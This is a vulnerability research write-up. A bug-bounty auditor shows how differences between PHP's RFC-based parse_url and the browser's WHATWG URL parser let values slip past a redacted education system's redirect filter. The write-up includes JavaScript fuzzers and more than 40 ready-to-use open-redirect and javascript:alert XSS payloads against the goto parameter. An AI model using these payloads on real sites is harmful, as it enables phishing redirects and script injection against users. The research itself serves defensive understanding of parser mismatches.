A Study of the Inconsistency Between the WHATWG URL Standard and the RFC URL Standard

In August 2022, while hunting for vulnerabilities for the Tianrongxin SRC, I found that a Tianrongxin Education site was running the redacted teaching and training system, so I downloaded the redacted source code from GitHub and audited it.

Source & Sink

The audit showed that the redacted education and training system uses a goto parameter in many places to redirect pages, for example in the login function:

http://demo.redacted.com/login?goto=/

If a logged-in user visits this URL, the back end reads the value of the goto parameter and writes it into the custom data-goto attribute of a div tag in the Twig template:

{% block content %}
  <div id="page-message-container" class="page-message-container" data-goto="{{ goto }}" data-duration={{ duration }}>
    <div class="page-message-panel">
      <div class="page-message-heading">
        <h2 class="page-message-title">{{ title|trans }}</h2>
      </div>
      <div class="page-message-body">{{ message|default('')|trans|raw }}</div>
    </div>
  </div>
{% endblock %}

The front end then reads the value of the data-goto attribute with the following JS code and navigates to it by assigning it to window.location.href:

function (e, t) {
  var n = $("#page-message-container"),
    r = n.data("goto"),      // redirect target taken from data-goto
    o = n.data("duration");  // delay taken from data-duration
  o > 0 && r && setTimeout((function () {
    window.location.href = r
  }), o)
}

Sanitizer/Filter

To prevent open redirect (OR) and XSS vulnerabilities during page redirection, redacted implements a back-end filter for the URL in the goto parameter:

/**
 * Filter URLs.
 *
 * If the URL belongs to a domain other than this site, return this site's home page address.
 *
 * @param $url string URL to be filtered
 *
 * @return string
 */
public function filterRedirectUrl($url)
{
    $host = $this->get('request_stack')->getCurrentRequest()->getHost();
    $safeHosts = [$host];

    $parsedUrl = parse_url($url);
    $isUnsafeHost = isset($parsedUrl['host']) && ! in_array($parsedUrl['host'], $safeHosts);
    $isInvalidUrl = isset($parsedUrl['scheme']) && ! in_array($parsedUrl['scheme'], ['http', 'https']);

    if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
        $url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
    }

    return strip_tags($url);
}

The filter works as follows:

Read the host of the current HTTP request (the Host header) and use it as the host whitelist.
Set the scheme whitelist to http and https.
Parse the incoming URL with PHP's URL parser (parse_url) to get the host part and the scheme part.
If a host part exists, check that it is in the host whitelist; if a scheme part exists, check that it is in the scheme whitelist.
If neither part exists, assume that the user passed in a relative URL and let it through.

Bypass the host check

How can we bypass the filter's host check? The following payload comes to mind:

https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/

The payload works because of the inconsistency between the front-end and back-end URL parsers:

PHP's parse_url considers the host part of the URL to be demo.redacted.com, which matches the Host header of the HTTP request, so the check passes.
The JavaScript URL parser disagrees: it treats \ as / in http URLs, so the payload is normalized into the following URL:

http://baidu.com/@demo.redacted.com/

Therefore, the front-end considers the host part of the URL to be baidu.com.

PHP URL parser:

php -r "var_dump(parse_url('http://baidu.com\@demo.redacted.com/'));"
Command line code:1:
array(4) {
  'scheme' =>
  string(4) "http"
  'host' =>
  string(16) "demo.redacted.com"
  'user' =>
  string(10) "baidu.com\"
  'path' =>
  string(1) "/"
}

Javascript URL parser:

> new URL('http://baidu.com\\@demo.redacted.com/')
URL {origin: 'http://baidu.com', protocol: 'http:', username: '', password: '', host: 'baidu.com',... }
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/@demo.redacted.com/"
origin: "http://baidu.com"
password: ""
pathname: "/@demo.redacted.com/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""

Note that \ is the escape character in JS string literals (for example the hexadecimal escape \x61 or the control character escape \n), so it is written as \\ in the demo code above.
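The escaping point can be checked directly in a JavaScript console. The following is only an illustrative sketch: the variable names are mine, and it assumes a runtime that provides the WHATWG URL class (a browser or Node.js).

```javascript
// String.raw keeps the backslash exactly as typed, like the payload on the wire.
const raw = String.raw`http://baidu.com\@demo.redacted.com/`;
// In a normal string literal the backslash has to be doubled to survive.
const escaped = 'http://baidu.com\\@demo.redacted.com/';
// With a single backslash, "\@" is read as an escape for "@" and the backslash is lost.
const unescaped = 'http://baidu.com\@demo.redacted.com/';

console.log(raw === escaped);             // true
console.log(new URL(escaped).hostname);   // baidu.com
console.log(new URL(unescaped).hostname); // demo.redacted.com
```

Without the doubled backslash the test string silently becomes an ordinary userinfo URL, which would hide the parser difference.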

Bypass scheme check

Bypassing the host check alone only gives us an open redirect. To get XSS, we also need to bypass the scheme check on the back end. How can we do that?

We can start from the following idea: since vulnerabilities often stem from false assumptions in a program, we can look for the false assumptions the filter makes and then try to break them.

$parsedUrl = parse_url($url);
$isUnsafeHost = isset($parsedUrl['host']) && ! in_array($parsedUrl['host'], $safeHosts);
$isInvalidUrl = isset($parsedUrl['scheme']) && ! in_array($parsedUrl['scheme'], ['http', 'https']);

if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
    $url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
}
return strip_tags($url);

Looking back at the filter code above, the filter assumes:

If the host and scheme parts cannot be parsed from the URL, it must be a relative URL.
A relative URL must be safe.

So what happens if we make parse_url return false?

false['host'] === NULL
false['scheme'] === NULL

The filter will conclude that the URL passed in by the user has no host or scheme part, so it must be a relative URL! Relative URLs are assumed to be safe, so the value is returned to the front end unchanged.
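To make the flawed assumption concrete, here is a minimal JavaScript model of the filter's decision. It is a sketch, not the project's code: isRejected and parsed are hypothetical names, parsed stands in for whatever parse_url returned (an object of components, or false), and PHP's empty() is simplified to an empty-string check.

```javascript
// Model of the filter's decision. `parsed` stands in for the return value of
// PHP's parse_url(): an object of URL components, or false when parsing fails.
function isRejected(url, parsed, safeHosts) {
  // In PHP, isset($parsedUrl['host']) is false when $parsedUrl itself is false.
  const host = parsed ? parsed.host : undefined;
  const scheme = parsed ? parsed.scheme : undefined;
  const isUnsafeHost = host !== undefined && !safeHosts.includes(host);
  const isInvalidUrl = scheme !== undefined && !['http', 'https'].includes(scheme);
  // Simplification: PHP's empty() is modelled as an empty-string check.
  return url === '' || isUnsafeHost || isInvalidUrl;
}

const safeHosts = ['demo.redacted.com'];

// A normally parsed javascript: URL is rejected by the scheme whitelist.
console.log(isRejected('javascript:alert(1)', { scheme: 'javascript', path: 'alert(1)' }, safeHosts)); // true
// When parsing fails, both checks are skipped and the value passes through.
console.log(isRejected('javascript:///%0dalert(1)', false, safeHosts)); // false
```

The second call shows the gap: a parse failure is indistinguishable from a harmless relative URL.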

How do we make parse_url return false?

PHP's URL parser is written against the RFC syntax, so if the URL passed in is malformed badly enough with respect to the RFC, parse_url returns false.

A classic payload, for example, gives a much simpler way to cause an open redirect:

https://demo.redacted.com/login?goto=http:///baidu.com

RFC 1738 states that in a hierarchical absolute URL, the scheme-specific part that follows the scheme must begin with //:

The scheme specific data start with a double slash “//” to indicate that it complies with the common Internet scheme syntax.

PHP’s URL parser therefore treats http:///baidu.com as an invalid URL and simply returns false, so the payload skips the subsequent checks and is returned to the front end.

The front-end URL parser disagrees and normalizes http:///baidu.com to http://baidu.com/:

> new URL('http:///baidu.com')
URL {origin: 'http://baidu.com', protocol: 'http:', username: '', password: '', host: 'baidu.com',... }
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/"
origin: "http://baidu.com"
password: ""
pathname: "/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""

So we have an open redirect vulnerability.

What about swapping http for javascript? The RFC only specifies that hierarchical URLs must contain the ‘//’ prefix; it does not specify what a URL parser should do if a non-hierarchical URL contains a ‘//’ prefix.

For example:

javascript:alert(1) ---> javascript://alert(1)
mailto:happyhacking@qq.com ---> mailto://happyhacking@qq.com

So I came up with this payload:

https://demo.redacted.com/login?goto=javascript:///%250dalert(1)

PHP’s URL parser considers javascript:///%250dalert(1) to be an invalid URL and returns false, so the filter skips the scheme check and simply treats it as a safe relative URL.

php -r "var_dump(parse_url('javascript:///%250dalert(1)'));"        
Command line code:1:
bool(false)

But the front end sees it differently.

The payload reflected to the front end looks like this:

window.location.href = 'javascript:///%0dalert(1)'

The front-end URL parser recognizes the scheme as javascript, so the browser percent-decodes the rest of the URL, turning ‘%0d’ into a carriage return (‘\r’), and hands the result to the JS engine. The JS engine treats ‘//’ as the start of a single-line comment, and because a carriage return is a line terminator, alert(1) becomes the next line of JS code after the comment.

So we have an XSS vulnerability!
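The comment-then-newline trick can be reproduced outside a browser. The sketch below is an assumption-laden model, not browser code: it imitates javascript: URL handling by dropping the scheme prefix and percent-decoding the rest, and fakeAlert is a hypothetical stand-in for window.alert.

```javascript
// The payload as it reaches window.location.href (the server has already
// decoded %250d to %0d).
const payload = 'javascript:///%0dalert(1)';

// Assumption: a simplified model of how a browser runs a javascript: URL,
// i.e. drop the "javascript:" prefix and percent-decode the rest.
const scriptSource = decodeURIComponent(payload.slice('javascript:'.length));

// Stand-in for window.alert so the sketch also runs outside a browser.
const alertCalls = [];
const fakeAlert = (value) => alertCalls.push(value);

// "///" opens a single-line comment, the carriage return ends it,
// and alert(1) runs as the next line.
new Function('alert', scriptSource)(fakeAlert);

console.log(JSON.stringify(scriptSource)); // "///\ralert(1)"
console.log(alertCalls);                   // [ 1 ]
```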

Further Research

Can we find more inconsistencies between the JS URL parser and the PHP URL parser by writing a fuzzer?

Question1: http:{char}//localhost:80/xxxx

Is there a character that we can put in the {char} position, between http: and //, such that the front-end URL parser still considers the host part of the URL to be localhost?

To find out, I wrote the following fuzzer:

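const log = [];
// Try every Unicode code point (0x0 to 0x10FFFF) in the {char} position.
for (let i = 0; i <= 0x10ffff; i++) {
  try {
    const url = new URL('http:' + String.fromCodePoint(i) + '//localhost:80/xxxx');
    if (url.host === 'localhost') {
      console.log(i + ' URL encoded i : ' + encodeURI(String.fromCodePoint(i)));
      log.push(i);
    }
  } catch (e) {
    // Skip inputs that the URL parser rejects or that encodeURI cannot encode.
  }
}
log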

Output:

9 URL encoded i : %09
10 URL encoded i : %0A
13 URL encoded i : %0D
47 URL encoded i : /
92 URL encoded i : %5C
(5) [9, 10, 13, 47, 92]

So how does PHP’s URL parser parse_url parse these payloads?

 ["http:%09//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "%09//localhost"
  }
  ["http:   //localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "   //localhost"
  }
  ["http:%0a//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "%0a//localhost"
  }
  ["http:\//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(12) "\//localhost"
  }
  ["http:///localhost"]=>
  bool(false)

As you can see, when faced with these payloads parse_url either treats everything after http: as the path, or treats the URL as invalid and returns false.

In other words, the following payloads can also bypass redacted’s URL filter and cause open redirects:

https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com
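As a quick sanity check, the goto values above can be fed to the WHATWG parser after one round of percent-decoding. This is a sketch under one assumption, labeled in the code: that the server decodes the query parameter once before reflecting it into data-goto. The variable names are mine.

```javascript
// Query-string values as sent in the goto parameter.
const gotoValues = [
  'http:\\//www.baidu.com',
  'http:%0d\\\\www.baidu.com',
  'http:%0a\\\\www.baidu.com',
  'http:%09\\\\www.baidu.com',
];

// Assumption: the server percent-decodes the query parameter once before
// reflecting it into data-goto.
const hosts = gotoValues.map((value) => new URL(decodeURIComponent(value)).host);

console.log(hosts); // every entry is 'www.baidu.com'
```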

Question2: http{char}://localhost:80/xxxx

Can we find a character between ‘http’ and ‘://’ that still makes the front-end URL parser think that the host part of the URL is localhost and the scheme part is http?

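const log = [];
// Try every Unicode code point (0x0 to 0x10FFFF) between 'http' and '://'.
for (let i = 0; i <= 0x10ffff; i++) {
  try {
    const url = new URL('http' + String.fromCodePoint(i) + '://localhost:80/xxxx');
    if (url.host === 'localhost' && url.protocol === 'http:') {
      console.log('i: ' + i + ' URL encoded i : ' + encodeURI(String.fromCodePoint(i)));
      console.log(url);
      log.push(i);
    }
  } catch (e) {
    // Skip inputs that the URL parser rejects or that encodeURI cannot encode.
  }
}
log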

Running results of the front-end URL parser:

9:  URL encoded i : %09
10:  URL encoded i : %0A
13:  URL encoded i : %0D

This time only three characters remain (/ and \ no longer work), which gives the following three payloads:

http%09://baidu.com
http%0a://baidu.com
http%0d://baidu.com

How does PHP’s URL parser parse these payloads?

  ["http%09://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%09://localhost:80/xxx"
  }
  ["http%0a://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%0a://localhost:80/xxx"
  }
  ["http%0d://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%0d://localhost:80/xxx"
  }

These payloads bypass both the filter’s scheme check and its host check:

window.location.href='http%0a://localhost:80/xxx' // exception
window.location.href='http\n://localhost:80/xxx' // works
window.location.href='javascript\n:alert(1)' // works
window.location.href='javascript\r:alert(1)' // works
window.location.href='javascript\t:alert(1)' // works

payloads:

https://demo.redacted.com/login?goto=javascript%0d:alert(1) // works
https://demo.redacted.com/login?goto=javascript%0a:alert(1) // works
https://demo.redacted.com/login?goto=javascript%09:alert(1) // works
https://demo.redacted.com/login?goto=http%09://baidu.com // works
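The difference between the percent-encoded and the decoded form can be seen with a small helper. This is an illustrative sketch: describe is a hypothetical helper of mine, and decodeURIComponent stands in for the server-side decoding of the goto parameter.

```javascript
// Hypothetical helper: summarize how the WHATWG parser sees an input,
// or report 'invalid' when new URL() throws.
function describe(input) {
  try {
    const url = new URL(input);
    return `${url.protocol} host=${url.host}`;
  } catch (error) {
    return 'invalid';
  }
}

// Still percent-encoded: "%" is not allowed in a scheme, and there is no base URL.
console.log(describe('http%0a://localhost:80/xxx'));                     // invalid
// After one round of decoding, the raw newline is stripped by the parser.
console.log(describe(decodeURIComponent('http%0a://localhost:80/xxx'))); // http: host=localhost
console.log(describe(decodeURIComponent('javascript%0d:alert(1)')));     // javascript: host=
```

This is why the payloads only fire once the back end has decoded the parameter and reflected the raw control character into the page.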

Question3: {char}http://localhost:80/xxxx

Is there a character that we can put before the ‘http’ scheme such that the front-end URL parser still considers the host part of the URL to be localhost and the scheme part to be http?

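const log = [];
// Try every Unicode code point (0x0 to 0x10FFFF) in front of the scheme.
for (let i = 0; i <= 0x10ffff; i++) {
  try {
    const url = new URL(String.fromCodePoint(i) + 'http://localhost:80/xxxx');
    if (url.host === 'localhost' && url.protocol === 'http:') {
      console.log(`i: ${i} ,URL encoded i : ` + encodeURI(String.fromCodePoint(i)) + ' string begin:' + String.fromCodePoint(i) + 'string end');
      log.push(i);
    }
  } catch (e) {
    // Skip inputs that the URL parser rejects or that encodeURI cannot encode.
  }
}
log
// Print the same prefixes in front of a javascript: payload.
log.forEach((i) => {
  //console.log(encodeURI(String.fromCodePoint(i))+'http://localhost:80/xxxx')
  console.log(encodeURI(String.fromCodePoint(i)) + 'javascript:alert(1)');
});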

payloads:

%00http://localhost:80/xxxx
%01http://localhost:80/xxxx
%02http://localhost:80/xxxx
%03http://localhost:80/xxxx
%04http://localhost:80/xxxx
%05http://localhost:80/xxxx
%06http://localhost:80/xxxx
%07http://localhost:80/xxxx
%08http://localhost:80/xxxx
%09http://localhost:80/xxxx
%0Ahttp://localhost:80/xxxx
%0Bhttp://localhost:80/xxxx
%0Chttp://localhost:80/xxxx
%0Dhttp://localhost:80/xxxx
%0Ehttp://localhost:80/xxxx
%0Fhttp://localhost:80/xxxx
%10http://localhost:80/xxxx
%11http://localhost:80/xxxx
%12http://localhost:80/xxxx
%13http://localhost:80/xxxx
%14http://localhost:80/xxxx
%15http://localhost:80/xxxx
%16http://localhost:80/xxxx
%17http://localhost:80/xxxx
%18http://localhost:80/xxxx
%19http://localhost:80/xxxx
%1Ahttp://localhost:80/xxxx
%1Bhttp://localhost:80/xxxx
%1Chttp://localhost:80/xxxx
%1Dhttp://localhost:80/xxxx
%1Ehttp://localhost:80/xxxx
%1Fhttp://localhost:80/xxxx
%20http://localhost:80/xxxx

Replace the http protocol with the javascript protocol:

%00javascript:alert(1)
%01javascript:alert(1)
%02javascript:alert(1)
%03javascript:alert(1)
%04javascript:alert(1)
%05javascript:alert(1)
%06javascript:alert(1)
%07javascript:alert(1)
%08javascript:alert(1)
%09javascript:alert(1)
%0Ajavascript:alert(1)
%0Bjavascript:alert(1)
%0Cjavascript:alert(1)
%0Djavascript:alert(1)
%0Ejavascript:alert(1)
%0Fjavascript:alert(1)
%10javascript:alert(1)
%11javascript:alert(1)
%12javascript:alert(1)
%13javascript:alert(1)
%14javascript:alert(1)
%15javascript:alert(1)
%16javascript:alert(1)
%17javascript:alert(1)
%18javascript:alert(1)
%19javascript:alert(1)
%1Ajavascript:alert(1)
%1Bjavascript:alert(1)
%1Cjavascript:alert(1)
%1Djavascript:alert(1)
%1Ejavascript:alert(1)
%1Fjavascript:alert(1)
%20javascript:alert(1)

How does PHP’s URL parser parse these payloads?

  ["%00http://localhost:80/xxxx"]=>
  array(1) {
    ["path"]=>
    string(27) "%00http://localhost:80/xxxx"
  }
  ["%01http://localhost:80/xxxx"]=>
  array(1) {
    ["path"]=>
    string(27) "%01http://localhost:80/xxxx"
  }
  ["%1Djavascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "%1Djavascript:alert(1)"
  }
  ["%1Ejavascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "%1Ejavascript:alert(1)"
  }

PHP’s URL parser considers the entire URL to be a relative URL.

Therefore, the following payloads bypass both the scheme check and the host check of the redacted filter:

https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)

Question4: ht{char}tp://localhost:80/xxxx

Let’s be a little more adventurous: is there a character that we can put between ht and tp such that the front-end URL parser still considers the scheme part of the URL to be http and the host part to be localhost?

fuzzer:

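const log = [];
// Try every Unicode code point (0x0 to 0x10FFFF) inside the scheme name.
for (let i = 0; i <= 0x10ffff; i++) {
  try {
    const url = new URL('ht' + String.fromCodePoint(i) + 'tp://localhost:80/xxxx');
    if (url.host === 'localhost' && url.protocol === 'http:') {
      console.log('i: ' + i + ' URL encoded i : ' + encodeURI(String.fromCodePoint(i)));
      console.log(url);
      log.push(i);
    }
  } catch (e) {
    // Skip inputs that the URL parser rejects or that encodeURI cannot encode.
  }
}
log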

Output:

i: 9 URL encoded i : %09
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
i: 10 URL encoded i : %0A
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
i: 13 URL encoded i : %0D
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
Array(3) [ 9, 10, 13 ]

payloads:

ht%0dtp://localhost
ht%0atp://localhost
ht%09tp://localhost
java%09script:alert(1)
java%0dscript:alert(1)
java%0ascript:alert(1)

So how does PHP’s URL parser handle these malformed URLs?

  ["ht%0dtp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%0dtp://localhost"
  }
  ["ht%0atp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%0atp://localhost"
  }
  ["ht%09tp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%09tp://localhost"
  }
  ["java%09script:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%09script:alert(1)"
  }
  ["java%0dscript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%0dscript:alert(1)"
  }
  ["java%0ascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%0ascript:alert(1)"
  }

Once again, PHP’s URL parser considers these URLs to be ordinary relative URLs, all of which pass the redacted filter’s check:

https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)

These three characters can actually be placed anywhere in scheme:

https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)
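The "anywhere in the scheme" claim can be checked exhaustively for one scheme name. The loop below is a small sketch with variable names of my choosing; it inserts each of the three characters at every position of "javascript", including before the first letter and right before the colon.

```javascript
const scheme = 'javascript';
const strippedChars = ['\t', '\n', '\r'];
const failures = [];

for (const ch of strippedChars) {
  // pos runs from 0 (before "j") to scheme.length (right before ":").
  for (let pos = 0; pos <= scheme.length; pos++) {
    const input = scheme.slice(0, pos) + ch + scheme.slice(pos) + ':alert(1)';
    if (new URL(input).protocol !== 'javascript:') {
      failures.push({ ch, pos });
    }
  }
}

console.log(failures.length); // 0
```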

Summary

By studying the inconsistencies between the JavaScript URL parser and the PHP URL parser further, I found more than 40 ways to bypass the redacted filter:

https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/
https://demo.redacted.com/login?goto=javascript:///%250dalert(1)
https://demo.redacted.com/login?goto=http:///www.baidu.com
https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com
https://demo.redacted.com/login?goto=javascript%0d:alert(1) 
https://demo.redacted.com/login?goto=javascript%0a:alert(1) 
https://demo.redacted.com/login?goto=javascript%09:alert(1) 
https://demo.redacted.com/login?goto=http%09://baidu.com 
https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)
https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

The root cause

Why is there such a big inconsistency between the JavaScript URL parser and the PHP URL parser?

Because there are two URL parsing standards: the RFC standard and the WHATWG standard.

The JavaScript URL parser follows the WHATWG standard, while the PHP URL parser and the URL parsers of most other back-end languages (excluding Node.js) follow the RFC specification!

Building on the RFC standard, the WHATWG has developed its own standard for URL parsing.

Here’s what the WHATWG spec says:

If input contains any leading or trailing C0 control or space, validation error.

Remove any leading and trailing C0 control or space from input.

In other words, if the input URL starts or ends with a C0 control or space character, a validation error is reported and those leading and trailing characters are removed. The C0 control range is 0x00-0x1F and space is 0x20, so C0 control or space covers 0x00-0x20.

So what is a validation error?

The WHATWG standard says:

A validation error indicates a mismatch between input and valid input. User agents, especially conformance checkers, are encouraged to report them somewhere. A validation error does not mean that the parser terminates. Termination of a parser is always stated explicitly, e.g., through a return statement.

In other words, a validation error only flags that the input is not valid; it does not stop parsing. The parser terminates only where the standard says so explicitly, for example through a return statement.

That’s why these payloads work:

https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
...
https://demo.redacted.com/login?goto=%20javascript:alert(1)
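The stripping of leading C0 control and space characters is easy to confirm for the whole 0x00-0x20 range. A minimal sketch, with variable names that are mine, assuming a runtime with the WHATWG URL class:

```javascript
const accepted = [];

for (let codePoint = 0x00; codePoint <= 0x20; codePoint++) {
  const input = String.fromCodePoint(codePoint) + 'javascript:alert(1)';
  const url = new URL(input);
  // The leading character is dropped before the scheme is parsed.
  if (url.protocol === 'javascript:' && url.href === 'javascript:alert(1)') {
    accepted.push(codePoint);
  }
}

console.log(accepted.length); // 33
```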

And then the WHATWG standard says:

If input contains any ASCII tab or newline, validation error.

Remove all ASCII tab or newline from input.

The standard defines ASCII tab or newline as follows:

An ASCII tab or newline is U+0009 TAB, U+000A LF, or U+000D CR.

That’s why these payloads work:

https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

This means that %0d, %0a, and %09 can be placed anywhere in the URL, since the JS URL parser removes them anyway. For example:

new URL('http:/\x09/baidu.com') 

URL {
    origin: 'http://baidu.com', 
    protocol: 'http:', 
    username: '', 
    password: '', 
    host: 'baidu.com'
}
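Both preprocessing steps quoted from the WHATWG standard can be approximated in a few lines. The preprocess function below is my own simplified model (two regular expressions), not the parser's implementation; it is only meant to show that the parser behaves as if the input had been cleaned this way first.

```javascript
// Assumption: a simplified model of the two preprocessing steps quoted above.
function preprocess(input) {
  return input
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '') // leading/trailing C0 control or space
    .replace(/[\t\n\r]/g, '');                           // ASCII tab or newline anywhere
}

// "ja" + TAB + "va" + LF + "scr" + CR + "ipt", wrapped in C0 controls and spaces.
const messy = ' \x00ja\tva\nscr\ript:alert(1)\x1f ';

console.log(preprocess(messy));                                          // javascript:alert(1)
console.log(new URL(messy).href === new URL(preprocess(messy)).href);    // true
console.log(new URL('http:/\x09/baidu.com').href);                       // http://baidu.com/
```

A back-end filter that inspects the raw string sees something quite different from what the browser ends up navigating to.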

Summary

The worst thing in the world is having two sets of standards for the same thing. If there is inconsistency in the standards, there will inevitably be inconsistency in the implementation. Security issues arising from inconsistencies are concealed because when you audit a single system, you may think there are no security problems. However, when you connect multiple systems to work together, security issues will emerge. This also illustrates that when auditing security issues, it is necessary to consider the overall situation rather than auditing a single system.

